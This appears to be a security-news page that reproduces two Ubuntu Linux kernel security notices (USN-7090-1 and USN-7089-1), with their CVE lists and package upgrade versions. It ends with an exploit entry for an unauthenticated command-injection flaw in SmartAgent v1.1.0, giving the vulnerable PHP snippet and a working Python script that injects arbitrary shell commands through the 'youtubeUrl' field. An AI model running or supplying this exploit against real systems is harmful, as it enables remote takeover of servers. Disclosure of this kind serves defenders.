CVE-2024-42094, CVE-2024-42245,CVE-2024-41051, CVE-2024-42250, CVE-2024-42151, CVE-2024-41059,CVE-2024-41056, CVE-2024-42095, CVE-2024-42131, CVE-2024-42271,CVE-2024-42066, CVE-2024-42240, CVE-2024-41017, CVE-2024-42141,CVE-2024-41072, CVE-2024-42229, CVE-2024-42239, CVE-2024-42073,CVE-2024-42124, CVE-2024-41080, CVE-2024-42146, CVE-2024-41018,CVE-2024-41021, CVE-2024-39487, CVE-2024-42086, CVE-2024-42109,CVE-2024-41045, CVE-2024-41037, CVE-2024-41097, CVE-2024-42225,CVE-2024-42102, CVE-2024-42117, CVE-2024-42077, CVE-2024-42230,CVE-2024-41087, CVE-2024-42089, CVE-2024-42252, CVE-2024-42247,CVE-2024-41057, CVE-2024-42121, CVE-2024-42232, CVE-2024-42090,CVE-2024-41042, CVE-2024-42244, CVE-2024-42156, CVE-2024-42135,CVE-2024-42155, CVE-2024-42103, CVE-2024-41015, CVE-2024-41022,CVE-2024-41085)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-6.8.0-1017-azure    6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-azure-fde  6.8.0-1017.20~22.04.1  linux-image-azure               6.8.0-1017.20~22.04.1  linux-image-azure-fde           6.8.0-1017.20~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7090-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858,  CVE-2024-45001, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-azure-6.8/6.8.0-1017.20~22.04.1

Ubuntu Security Notice USN-7090-1

Ubuntu Security Notice 7089-1 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7089-1November 01, 2024linux, linux-azure-6.8, linux-gcp-6.8, linux-hwe-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-azure-6.8: Linux kernel for Microsoft Azure cloud systems- linux-gcp-6.8: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-6.8: Linux hardware enablement (HWE) kernelDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-41079, CVE-2024-41058, CVE-2024-41029, CVE-2024-42253,CVE-2024-41075, CVE-2024-42280, CVE-2024-42102, CVE-2024-41055,CVE-2024-41025, CVE-2024-42124, CVE-2024-41060, CVE-2024-41027,CVE-2024-42145, CVE-2024-42146, CVE-2024-42251, CVE-2024-41081,CVE-2024-42065, CVE-2024-42129, CVE-2024-41031, CVE-2024-41035,CVE-2024-41047, CVE-2023-52888, CVE-2024-42248, CVE-2024-41039,CVE-2024-42119, CVE-2024-41038, CVE-2024-42150, CVE-2024-42073,CVE-2024-42089, CVE-2024-41007, CVE-2024-42120, CVE-2024-42069,CVE-2024-41096, CVE-2024-42153, CVE-2024-41012, CVE-2024-42151,CVE-2024-42241, CVE-2024-42126, CVE-2024-42092, CVE-2024-42231,CVE-2024-41032, CVE-2024-41076, CVE-2024-42136, CVE-2024-41078,CVE-2024-41068, CVE-2024-41070, CVE-2024-41091, CVE-2024-42063,CVE-2024-42157, CVE-2024-42118, CVE-2024-41046, CVE-2024-41023,CVE-2024-42094, CVE-2024-41042, CVE-2024-41034, CVE-2024-42096,CVE-2024-42105, CVE-2024-41051, CVE-2024-42239, CVE-2024-42117,CVE-2024-41019, CVE-2024-41033, CVE-2024-42223, CVE-2024-41098,CVE-2024-41052, CVE-2024-41036, CVE-2024-41087, CVE-2024-42115,CVE-2024-41057, CVE-2024-42161, CVE-2024-42240, CVE-2024-41093,CVE-2024-42097, CVE-2024-42077, CVE-2024-41062, CVE-2024-42156,CVE-2024-41077, CVE-2024-42235, CVE-2024-41085, CVE-2023-52887,CVE-2024-42237, CVE-2024-41061, CVE-2024-41073, CVE-2024-42087,CVE-2024-41086, CVE-2024-41044, CVE-2024-41066, CVE-2024-42128,CVE-2024-42144, CVE-2024-42227, CVE-2024-41020, CVE-2024-41015,CVE-2024-42232, CVE-2024-41072, CVE-2024-41030, CVE-2024-42098,CVE-2024-42121, CVE-2024-42080, CVE-2024-41071, CVE-2024-42225,CVE-2024-42064, CVE-2024-42246, CVE-2024-42113, CVE-2024-41082,CVE-2024-42095, CVE-2024-41080, CVE-2024-41056, CVE-2024-42147,CVE-2024-41069, CVE-2024-42135, CVE-2024-42245, CVE-2024-42244,CVE-2024-42271, CVE-2024-41084, CVE-2024-42234, CVE-2024-41064,CVE-2024-42108, CVE-2024-41090, CVE-2024-42079, CVE-2024-42138,CVE-2024-42127, CVE-2024-42149, CVE-2024-41067, CVE-2024-42130,CVE-2024-42086, CVE-2024-41045, CVE-2024-42088, CVE-2024-42131,CVE-2024-41063, CVE-2024-42111, CVE-2024-41088, CVE-2024-42110,CVE-2024-41074, CVE-2024-41041, CVE-2024-39487, CVE-2024-42076,CVE-2024-42091, CVE-2024-42132, CVE-2024-42100, CVE-2024-41010,CVE-2024-42093, CVE-2024-41048, CVE-2024-41059, CVE-2024-42137,CVE-2024-41065, CVE-2024-42067, CVE-2024-42140, CVE-2024-42250,CVE-2024-42084, CVE-2024-42155, CVE-2024-41021, CVE-2024-41089,CVE-2024-42106, CVE-2024-41083, CVE-2024-42112, CVE-2024-42101,CVE-2024-42229, CVE-2024-41053, CVE-2024-42074, CVE-2024-42252,CVE-2024-41018, CVE-2024-41095, CVE-2024-42090, CVE-2024-41097,CVE-2024-42236, CVE-2024-42109, CVE-2024-42158, CVE-2024-43858,CVE-2024-42133, CVE-2024-42066, CVE-2024-41094, CVE-2024-39486,CVE-2024-41050, CVE-2024-41028, CVE-2024-42114, CVE-2024-41049,CVE-2024-42070, CVE-2024-42243, CVE-2024-41092, CVE-2024-43855,CVE-2024-42103, CVE-2024-41022, CVE-2024-42142, CVE-2024-42238,CVE-2024-42152, CVE-2024-41037, CVE-2024-42230, CVE-2024-42082,CVE-2024-42085, CVE-2024-42104, CVE-2024-41017, CVE-2024-41054,CVE-2024-42068, CVE-2024-42141, CVE-2024-42247)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-48-generic    6.8.0-48.48  linux-image-6.8.0-48-generic-64k  6.8.0-48.48  linux-image-generic             6.8.0-48.48  linux-image-generic-64k         6.8.0-48.48  linux-image-generic-64k-hwe-24.04  6.8.0-48.48  linux-image-generic-hwe-24.04   6.8.0-48.48  linux-image-generic-lpae        6.8.0-48.48  linux-image-kvm                 6.8.0-48.48  linux-image-virtual             6.8.0-48.48  linux-image-virtual-hwe-24.04   6.8.0-48.48Ubuntu 22.04 LTS  linux-image-6.8.0-1017-azure    6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-azure-fde  6.8.0-1017.20~22.04.1  linux-image-6.8.0-1017-gcp      6.8.0-1017.19~22.04.1  linux-image-6.8.0-48-generic    6.8.0-48.48~22.04.1  linux-image-6.8.0-48-generic-64k  6.8.0-48.48~22.04.1  linux-image-azure               6.8.0-1017.20~22.04.1  linux-image-azure-fde           6.8.0-1017.20~22.04.1  linux-image-gcp                 6.8.0-1017.19~22.04.1  linux-image-generic-64k-hwe-22.04  6.8.0-48.48~22.04.1  linux-image-generic-hwe-22.04   6.8.0-48.48~22.04.1  linux-image-oem-22.04           6.8.0-48.48~22.04.1  linux-image-oem-22.04a          6.8.0-48.48~22.04.1  linux-image-oem-22.04b          6.8.0-48.48~22.04.1  linux-image-oem-22.04c          6.8.0-48.48~22.04.1  linux-image-oem-22.04d          6.8.0-48.48~22.04.1  linux-image-virtual-hwe-22.04   6.8.0-48.48~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7089-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-48.48  https://launchpad.net/ubuntu/+source/linux-azure-6.8/6.8.0-1017.20~22.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-6.8/6.8.0-1017.19~22.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-6.8/6.8.0-48.48~22.04.1

Ubuntu Security Notice USN-7089-1

SmartAgent version 1.1.0 suffers from an unauthenticated remote code execution vulnerability in youtubeInfo.php.

    # Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.Vulnerable code snippet from youtubeInfo.php:"""$youtubeUrl=$_POST["youtubeUrl"];$command = 'youtube-dl -j ' . $youtubeUrl;echo  shell_exec($command);"""Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smarts-srlcom.com?youtubeInfo.php"command = input("Enter the command you want to run $EX: id$: ")postdata = {    "youtubeUrl": ";" + command}response = requests.post(url, data=postdata, verify=False)print(response.text)

Tag

#linux